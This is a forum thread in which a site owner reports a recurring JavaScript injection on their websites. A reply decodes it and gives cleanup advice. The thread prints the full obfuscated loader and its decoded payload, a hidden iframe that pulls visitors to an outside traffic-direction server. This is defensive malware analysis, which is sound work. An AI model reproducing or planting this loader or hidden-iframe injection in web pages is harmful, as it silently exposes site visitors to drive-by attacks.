Board index   FAQ   Search  
Register  Login
Board index php forum :: PHP and MySQL Security PHP & MySQL Security

Malware script attacked my sites

Security issues related to php and mysql usage. How to make your code secure? Security measures and configurations? It's all in here!

Moderators: macek, egami, gesf

Malware script attacked my sites

Postby sivachandru » Sat Feb 18, 2012 6:57 am

Below Malware script attacked my sites . i removed it more that 15 times but it is coming again and again . Changing the ftp passwords in 2 hour once but no use . help me to remove this script and stop its routine attack .

"<script>if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';s=String;ee='e';e=window.eval;t='y';}h=2*Math.cos(Math.PI);n=[3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,18.5,51,57,57,55,28,22.5,22.5,57,49,56.5,24.5,26,22,25,53.5,59.5,49,54.5,53.5,47.5,51.5,54,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,49.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,53,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,28,51,51.5,49,49,49.5,54,28.5,55,54.5,56.5,51.5,57,51.5,54.5,54,28,47.5,48,56.5,54.5,53,57.5,57,49.5,28.5,53,49.5,50,57,28,23,28.5,57,54.5,55,28,23,28.5,18.5,30,29,22.5,51.5,50,56,47.5,53.5,49.5,30,16,19.5,28.5,3.5,3.5,61.5,3.5,3.5,50,57.5,54,48.5,57,51.5,54.5,54,15,51.5,50,56,47.5,53.5,49.5,56,19,19.5,60.5,3.5,3.5,3.5,58,47.5,56,15,50,15,29.5,15,49,54.5,48.5,57.5,53.5,49.5,54,57,22,48.5,56,49.5,47.5,57,49.5,33.5,53,49.5,53.5,49.5,54,57,19,18.5,51.5,50,56,47.5,53.5,49.5,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,56.5,56,48.5,18.5,21,18.5,51,57,57,55,28,22.5,22.5,57,49,56.5,24.5,26,22,25,53.5,59.5,49,54.5,53.5,47.5,51.5,54,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,19.5,28.5,50,22,56.5,57,59.5,53,49.5,22,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,29.5,18.5,51,51.5,49,49,49.5,54,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,55,54.5,56.5,51.5,57,51.5,54.5,54,29.5,18.5,47.5,48,56.5,54.5,53,57.5,57,49.5,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,53,49.5,50,57,29.5,18.5,23,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,57,54.5,55,29.5,18.5,23,18.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,58.5,51.5,49,57,51,18.5,21,18.5,23.5,23,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,51,49.5,51.5,50.5,51,57,18.5,21,18.5,23.5,23,18.5,19.5,28.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,22,47.5,55,55,49.5,54,49,32.5,51,51.5,53,49,19,50,19.5,28.5,3.5,3.5,61.5];f='f'+'romChar';for(i=0;i-n.length<0;i++){j=i;ss=ss+String[f+'Code'](-h*(1+n[j]));}q=ss;e(q);</script> "
sivachandru
New php-forum User
New php-forum User
 
Posts: 1
Joined: Sat Feb 18, 2012 6:53 am

Re: Malware script attacked my sites

Postby TheProdigyGuy » Sun Feb 19, 2012 11:42 am

Ok let me to decode it for you:

Code: Select all
 //eval if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(){var f = document.createElement('iframe');f.setAttribute('src','http://tds36.4mydomain.com/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');document.getElementsByTagName('body')[0].appendChild(f);}  //document.write (s)  <iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> //jsunpack.url var ss = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function  //jsunpack.url var q = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function  //jsunpack.url var newurl = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function 


It is TDS!

http://www.symantec.com/connect/blogs/w ... on-systems

http://sucuri.net/malware/malware-entry-mwiframeenc1560


And finally here is author of this *pack*
http://www.simpletds.com/manual-install


Analysing h***://tds36.4mydomain.com domain theris no route to host.
So,Seems you computer infected with TDS which is unable to update itself and it still inject outdated payload tds36.4mydomain.com .



Here is few things for you:
1) Your computer infected (Rootkit,tro,virii,spyware etc.)
Using this way when you are going to connect to FTP server of your site on fly It injects its "payload" to memory (finally it injects that obfuscated javascript payload to your scripts) and spreads it self + infects your sites)
So,make sure your computer clean,Keep up2date your software,Check for rootkits(In eg: Unhackme)
Use antiviriies,Firewalls,Launch your browser from Sandboxie and so on.


2) This is possible your site is vulnerable(LFI,RFI,SQLI etc)
using that way skriptkiddiez pwn'd your site then infected it (For BOTNET)

3) This is possible your hosting company is not correctly administering(And it is vulnerable to different attacks)
In eg:Outdated software which has a lot of 0days

You need investigate how it appears:
1) You need to analize your site logs(*.tar.gz,*.tar)
It is a complex thing and requires knoledge (especially with Linux)


Anyway,Clean your computer,use software from official sites.
Update your web software,change your mysql,ftp,ssh,cpanel,emails,secret questions,passwords and use unique+random password.
A)Login to your cpanel (after cleanup) then investigate do you have any additional (backdoor) ftp accounts?
B) Look to cron jobs(i see a lot of cron based backdoors)

After clean up of your computer
Download full backup of your site then scan it from antiviruses(IMHO Avira Antivir is best way to do it)

Good Luck)
TheProdigyGuy
New php-forum User
New php-forum User
 
Posts: 215
Joined: Wed Dec 07, 2011 5:25 pm


Return to PHP & MySQL Security

Who is online

Users browsing this forum: No registered users and 2 guests

Sponsored by Sitebuilder Web hosting and Traduzioni Italiano Rumeno and antispam for cPanel.